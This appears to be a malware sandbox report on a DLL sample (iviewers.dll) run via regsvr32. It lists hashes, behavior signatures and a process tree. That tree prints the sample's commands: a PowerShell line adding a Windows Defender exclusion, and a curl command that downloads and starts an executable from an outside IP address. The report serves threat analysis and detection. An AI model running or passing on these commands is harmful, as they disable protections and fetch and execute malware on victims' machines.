Overview
overview
10Static
static
3517b4e9dea...21.dat
windows7-x64
3517b4e9dea...21.dat
windows10-2004-x64
36a7718c005...82.bin
windows7-x64
36a7718c005...82.bin
windows10-2004-x64
36b5fcc0618...f1.txt
windows7-x64
16b5fcc0618...f1.txt
windows10-2004-x64
170949548f4...7e.txt
windows7-x64
170949548f4...7e.txt
windows10-2004-x64
1Polysy_Launcher.exe
windows10-2004-x64
10a48116275b...82.dat
windows7-x64
3a48116275b...82.dat
windows10-2004-x64
3iviewers.dll
windows7-x64
8iviewers.dll
windows10-2004-x64
10Resubmissions
07/03/2025, 03:43
250307-ead1pas1d1 10Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 03:43
Static task
static1
Behavioral task
behavioral1
Sample
517b4e9dea5396ee6996f1ae35291121.dat
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
517b4e9dea5396ee6996f1ae35291121.dat
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
6a7718c005eed33ce409b03914a5b782.bin
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
6a7718c005eed33ce409b03914a5b782.bin
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
6b5fcc06180fde176b0cbef028282df1.txt
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
6b5fcc06180fde176b0cbef028282df1.txt
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
70949548f432b49d62b8b4a1cddbc07e.txt
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
70949548f432b49d62b8b4a1cddbc07e.txt
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
Polysy_Launcher.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral10
Sample
a48116275bbf2d3781a72732edfad182.dat
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
a48116275bbf2d3781a72732edfad182.dat
Resource
win10v2004-20250217-en
Behavioral task
behavioral12
Sample
iviewers.dll
Resource
win7-20240903-en
General
-
Target
iviewers.dll
-
Size
83KB
-
MD5
5d57d199c4418e0cd2305dbe761ec9ae
-
SHA1
9dfdaf2c9f92c1d6bf3ac1d65d0fbca32e2f0359
-
SHA256
be71bb6d00d2759b6e925249307d08f900ddfc48744b6b3a1cac2e6100724c37
-
SHA512
8817eea5118074e95d9e2d3ac5a4216959122d3379add8d250c29e1e18403d9c5e95f8d5f687db8995183cfb6418e696553ca0ad3f4e7ab363cf341b7e3e239b
-
SSDEEP
1536:vbo5eK+wzZQ1LRC7ivPv8ZqTfXeqvz+NBGQS18sWpcdVQPLHWeDCf7/P/:vs5tXVQLRC7iv4qTvcGQS1VQPjWeDCfb
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2536 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2080 wrote to memory of 2472 2080 regsvr32.exe 31 PID 2472 wrote to memory of 2500 2472 regsvr32.exe 32 PID 2472 wrote to memory of 2500 2472 regsvr32.exe 32 PID 2472 wrote to memory of 2500 2472 regsvr32.exe 32 PID 2472 wrote to memory of 2500 2472 regsvr32.exe 32 PID 2500 wrote to memory of 2536 2500 cmd.exe 34 PID 2500 wrote to memory of 2536 2500 cmd.exe 34 PID 2500 wrote to memory of 2536 2500 cmd.exe 34 PID 2500 wrote to memory of 2536 2500 cmd.exe 34 PID 2472 wrote to memory of 2700 2472 regsvr32.exe 35 PID 2472 wrote to memory of 2700 2472 regsvr32.exe 35 PID 2472 wrote to memory of 2700 2472 regsvr32.exe 35 PID 2472 wrote to memory of 2700 2472 regsvr32.exe 35
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\2.exe'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\2.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 2.exe http://147.45.44.170/2.exe & start 2.exe3⤵
- System Location Discovery: System Language Discovery
PID:2700
-
-